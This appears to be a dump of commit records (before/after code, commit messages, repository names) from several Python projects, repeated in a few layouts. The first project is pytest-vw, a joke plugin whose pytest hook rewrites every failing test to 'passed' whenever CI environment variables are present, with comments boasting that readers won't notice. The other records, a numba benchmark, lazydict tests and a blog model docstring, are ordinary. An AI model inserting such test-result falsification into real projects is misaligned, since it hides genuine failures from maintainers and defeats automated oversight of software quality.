rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in _config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_configure(config):
global _config
_config = config
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in item.config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
Use item.config to access config.
|
Use item.config to access config.
Fixes #1.
|
Python
|
mit
|
The-Compiler/pytest-vw
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
_config = None
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in _config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_configure(config):
global _config
_config = config
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
Use item.config to access config.
Fixes #1.
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in item.config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
<commit_before># -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
_config = None
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in _config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_configure(config):
global _config
_config = config
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
<commit_msg>Use item.config to access config.
Fixes #1.<commit_after>
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in item.config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
_config = None
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in _config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_configure(config):
global _config
_config = config
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
Use item.config to access config.
Fixes #1.# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in item.config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
<commit_before># -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
_config = None
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in _config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_configure(config):
global _config
_config = config
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
<commit_msg>Use item.config to access config.
Fixes #1.<commit_after># -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
rep = outcome.get_result()
examinators = EXAMINATORS
for examinator in item.config.getini('vw_examinators').split('\n'):
examinators.append(examinator.strip())
if any(os.environ.get(gaze, False) for gaze in examinators):
rep.outcome = 'passed'
def pytest_addoption(parser):
parser.addini('vw_examinators', 'List of additional VW examinators.')
|
e87490ea157f4882f644329e4b447f51c0a2acb3
|
benchmarks/bench_vectorize.py
|
benchmarks/bench_vectorize.py
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
del _binary_func
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
@vectorize(["float32(float32, float32)",
"float64(float64, float64)"])
def rel_diff(x, y):
# XXX for float32 performance, we should write `np.float32(2)`, but
# that's not the natural way to write this code...
return 2 * (x - y) / (x + y)
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0.1, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
time_rel_diff_float32 = _binary_func(rel_diff, 'float32')
time_rel_diff_float64 = _binary_func(rel_diff, 'float64')
del _binary_func
|
Add a relative difference vectorization benchmark
|
Add a relative difference vectorization benchmark
|
Python
|
bsd-2-clause
|
gmarkall/numba-benchmark,numba/numba-benchmark
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
del _binary_func
Add a relative difference vectorization benchmark
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
@vectorize(["float32(float32, float32)",
"float64(float64, float64)"])
def rel_diff(x, y):
# XXX for float32 performance, we should write `np.float32(2)`, but
# that's not the natural way to write this code...
return 2 * (x - y) / (x + y)
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0.1, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
time_rel_diff_float32 = _binary_func(rel_diff, 'float32')
time_rel_diff_float64 = _binary_func(rel_diff, 'float64')
del _binary_func
|
<commit_before>"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
del _binary_func
<commit_msg>Add a relative difference vectorization benchmark<commit_after>
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
@vectorize(["float32(float32, float32)",
"float64(float64, float64)"])
def rel_diff(x, y):
# XXX for float32 performance, we should write `np.float32(2)`, but
# that's not the natural way to write this code...
return 2 * (x - y) / (x + y)
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0.1, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
time_rel_diff_float32 = _binary_func(rel_diff, 'float32')
time_rel_diff_float64 = _binary_func(rel_diff, 'float64')
del _binary_func
|
"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
del _binary_func
Add a relative difference vectorization benchmark"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
@vectorize(["float32(float32, float32)",
"float64(float64, float64)"])
def rel_diff(x, y):
# XXX for float32 performance, we should write `np.float32(2)`, but
# that's not the natural way to write this code...
return 2 * (x - y) / (x + y)
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0.1, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
time_rel_diff_float32 = _binary_func(rel_diff, 'float32')
time_rel_diff_float64 = _binary_func(rel_diff, 'float64')
del _binary_func
|
<commit_before>"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
del _binary_func
<commit_msg>Add a relative difference vectorization benchmark<commit_after>"""
Benchmarks for ``@vectorize`` ufuncs.
"""
import numpy as np
from numba import vectorize
@vectorize(["float32(float32, float32)",
"float64(float64, float64)",
"complex64(complex64, complex64)",
"complex128(complex128, complex128)"])
def mul(x, y):
return x * y
@vectorize(["float32(float32, float32)",
"float64(float64, float64)"])
def rel_diff(x, y):
# XXX for float32 performance, we should write `np.float32(2)`, but
# that's not the natural way to write this code...
return 2 * (x - y) / (x + y)
class TimeSuite:
n = 10000
dtypes = ('float32', 'float64', 'complex64', 'complex128')
def setup(self):
self.samples = {}
self.out = {}
for dtype in self.dtypes:
self.samples[dtype] = np.linspace(0.1, 1, self.n, dtype=dtype)
self.out[dtype] = np.zeros(self.n, dtype=dtype)
def _binary_func(func, dtype):
def f(self):
func(self.samples[dtype], self.samples[dtype], self.out[dtype])
return f
for dtype in dtypes:
locals()['time_mul_%s' % dtype] = _binary_func(mul, dtype)
time_rel_diff_float32 = _binary_func(rel_diff, 'float32')
time_rel_diff_float64 = _binary_func(rel_diff, 'float64')
del _binary_func
|
f94c946d135aed30f4d9068844b563fa94e39ff1
|
test.py
|
test.py
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(str(d), "{'a': 1}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(repr(d), "LazyDictionary({'a': 1})")
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(str(d), "{'a': {'b': 1}}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(repr(d), "LazyDictionary({'a': {'b': 1}})")
|
Check recursion in str() and repr()
|
Check recursion in str() and repr()
|
Python
|
mit
|
janrain/lazydict
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(str(d), "{'a': 1}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(repr(d), "LazyDictionary({'a': 1})")
Check recursion in str() and repr()
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(str(d), "{'a': {'b': 1}}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(repr(d), "LazyDictionary({'a': {'b': 1}})")
|
<commit_before>from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(str(d), "{'a': 1}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(repr(d), "LazyDictionary({'a': 1})")
<commit_msg>Check recursion in str() and repr()<commit_after>
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(str(d), "{'a': {'b': 1}}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(repr(d), "LazyDictionary({'a': {'b': 1}})")
|
from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(str(d), "{'a': 1}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(repr(d), "LazyDictionary({'a': 1})")
Check recursion in str() and repr()from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(str(d), "{'a': {'b': 1}}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(repr(d), "LazyDictionary({'a': {'b': 1}})")
|
<commit_before>from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(str(d), "{'a': 1}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': 1})
self.assertEqual(repr(d), "LazyDictionary({'a': 1})")
<commit_msg>Check recursion in str() and repr()<commit_after>from unittest import TestCase
import lazydict
class TestLazyDictionary(TestCase):
def test_circular_reference_error(self):
d = lazydict.LazyDictionary()
d['foo'] = lambda s: s['foo']
self.assertRaises(lazydict.CircularReferenceError, d.__getitem__, 'foo')
def test_constant_redefinition_error(self):
d = lazydict.LazyDictionary()
d['a'] = 1
d['b'] = 2
d['sum'] = lambda s: s['a'] + s['b']
x = d['sum']
self.assertRaises(lazydict.ConstantRedefinitionError, d.__setitem__, 'a', 'hotdog')
self.assertRaises(lazydict.ConstantRedefinitionError, d.__delitem__, 'a')
def test_lazy_evaluation(self):
d = lazydict.LazyDictionary()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
self.assertEqual(d['sum'], 3)
def test_str(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(str(d), "{'a': {'b': 1}}")
def test_repr(self):
d = lazydict.LazyDictionary({'a': {'b': 1}})
self.assertEqual(repr(d), "LazyDictionary({'a': {'b': 1}})")
|
1469da25fec3e3e966d5a0b5fab11dd279bbe05a
|
blogsite/models.py
|
blogsite/models.py
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : db.Column
Autogenerated primary key
title : db.Column
body : db.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : SQLAlchemy.Column
Autogenerated primary key
title : SQLAlchemy.Column
body : SQLAlchemy.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
|
Correct type comment for table columns
|
Correct type comment for table columns
|
Python
|
mit
|
paulaylingdev/blogsite,paulaylingdev/blogsite
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : db.Column
Autogenerated primary key
title : db.Column
body : db.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
Correct type comment for table columns
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : SQLAlchemy.Column
Autogenerated primary key
title : SQLAlchemy.Column
body : SQLAlchemy.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
|
